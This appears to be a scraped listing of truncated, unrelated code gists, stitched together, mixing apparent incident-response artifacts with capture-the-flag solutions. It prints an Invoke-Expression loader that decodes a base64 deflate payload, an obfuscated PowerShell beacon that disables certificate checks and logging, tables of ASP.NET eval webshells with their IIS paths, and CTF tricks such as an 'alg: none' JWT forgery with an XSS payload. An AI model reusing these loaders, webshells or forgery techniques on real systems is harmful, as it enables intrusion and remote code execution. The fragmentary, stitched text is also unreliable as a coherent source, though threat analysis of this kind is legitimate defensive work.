This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[string]$mac = (getmac /FO CSV|Select-Object -Skip 1 -first 1| ConvertFrom-Csv -Header MAC|select-object -expand MAC) | |
try{ | |
$name = 'Global\PSEXEC' | |
$exeflag = $flase | |
New-Object System.Threading.Mutex ($true,$name,[ref]$exeflag) | |
}catch{} | |
| |
$dt = Get-Date -Format 'yyMMdd' | |
$path = "$env:temp\\ccc.log" | |
[string]$flag = test-path $path |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ivte0dbG8+P7vtsim6Wfp1kXe4re7z75MT17/5M+8zst82m5/Oflp+pFuv35brNLddPu8qJs23f2Z9KRaXuZ1+6yuFtsnzWW6/e08m+V1+sXxyc808m6l7+bvVtlyhm/u/MZJW1//4t84+bHfbZktcur248/LapKVv+/L16e/9+nJx/gmf5efl9kFffm70c8mp89e5FcGk9fXTZsvxm/mNfVH+I+/WLf5u3Trd2vrdT5isKPv1fn59w0c6vOXTLN2Ov/Fv+Q3Tn7j5HebtQT587zdfpq1ebr9rKoXWZt+fH39xRezGSHwu62ydk5NPvrd8uXlI+pr9fv+vtPpdFxWFx/9xomlmqLY5k27zW/we3g9rxcF+ki3vvc6n67ror0ev6SXpsUqK8ffLZaz6qqxH3x/Q6OzWb5s6ZvvP3pECJ+s65r+3rpzZ3zWnC1fVWW+qYcn66Jspdn304+OZ4tiWRDyWVvVHxFNfre3+TVGSXP+2UefgAk++egXZpf4PbukX2lym6Ja0t9bINZ3F4VhhROalCalXu7t/f5f0mizlggi03JnrK8RgEnR9l8eeOvL18f1dF601GRd5+kn6Ue/EPTd++wj+l1Ijc9m1SIrlvxhB+4Vw51WixVxQ90o2Kfcnl9dN3kt0DCrX70+ffXi+ItT/urla/1C+OU3TorzLelzO/9F6cfPsrLJP77zi5UNzwiyzHW63V6v8vS8KMGieEmmnpv+mPL5j/1 |
We can make this file beautiful and searchable if this error is corrected: Illegal quoting in line 2.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Occurrences, WebShell Source | |
190, <script language="JScript" runat="server">function Page_Load(){eval(Request["NO9BxmCXw0JE"],"unsafe");}</script> | |
50, <script language="JScript" runat="server">function Page_Load(){eval(Request["orange"],"unsafe");}</script> | |
11, <script language="JScript" runat="server">function Page_Load(){eval(Request["bingo"],"unsafe");}</script> | |
7, <script language="JScript" runat="server">function Page_Load(){eval(Request["error"],"unsafe");}</script> | |
5, <script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script> | |
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["7gHQRih3fnam"],"unsafe");}</script> | |
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["coStWhkzUF7n"],"unsafe");}</script> | |
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["E9RyGFIM8h3S"],"unsafe");}</script> | |
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["EiH4yV2 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Occurrences | Webshell Filename | WebShell Syntax | |
---|---|---|---|
46 | C:\inetpub\wwwroot\aspnet_client\supp0rt.aspx | http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["orange"],"unsafe");}</script> | |
35 | C:\inetpub\wwwroot\aspnet_client\discover.aspx | http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script> | |
21 | C:\inetpub\wwwroot\aspnet_client\shell.aspx | http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["gttkomomo"],"unsafe");}</script> | |
13 | C:\inetpub\wwwroot\aspnet_client\HttpProxy.aspx | http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["bingo"],"unsafe");}</script> | |
8 | C:\inetpub\wwwroot\aspnet_client\0QWYSEXe.aspx | http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["XOrSeMr3kgWUdFf6"],"unsafe");}</script> | |
7 | C:\inetpub\wwwroot\aspnet_client\system_web\error.aspx | http://f/<script language= |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Run ltrace | |
ltrace ./Challenge.Challenge | |
# Enter a bogus username to see the `strcmp` instruction and see the correct answer. | |
# Get the flag | |
echo "AGB6js5d9dkG7" | ./Challenge.Challenge |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0..4|%{try | |
{ | |
$LogEngineLifeCycleEvent=$LogEngineHealthEvent=$LogProviderLifecycleEvent=$LogProviderHealthEvent=$False; | |
$u=[System.Text.Encoding]::UTF8; | |
sAl er Get-Random; | |
$l=[System.Net.WebRequest]; | |
sAL no New-Object; | |
$g=[SysTEm.Net.SeRvICePoIntMAnaGEr]; | |
$g::Expect100ConTINuE=0; | |
$g::ServerCertificateValidationCallback={1}; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"Status": 0, | |
"TC": false, | |
"RD": true, | |
"RA": true, | |
"AD": false, | |
"CD": false, | |
"Question": [ | |
{ | |
"name": "dmarc.jqueryupdatejs.com.", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
exiftool -b favicon/00000.png | dd bs=1 skip=156 | head -c -84 2>/dev/null > file | |
for i in {00001..00109} | |
do | |
exiftool -b favicon/$i.png | dd bs=1 skip=156 | head -c -84 2>/dev/null >> file | |
done | |
strings file | grep -i "IceCTF" --color=none | tail -n 1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
first_piece = '{ "typ": "JWT", "alg": "none" }' | |
our_xss = '<script>alert("xss")</script>' | |
second_piece = ''' | |
{ "username": "%s", | |
"flag": "IceCTF{hope you don\'t think this is a real flag}"}''' \ | |
% our_xss.replace('"','\\"') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import re | |
h = open('secret.c') | |
lines = [ x[:-1] for x in h.readlines() ] # remove newline char | |
h.close() | |
flag = [] | |
for line in lines: | |
num =''.join(re.findall(r'\s+', line)).replace('\t','1').replace(' ','0') |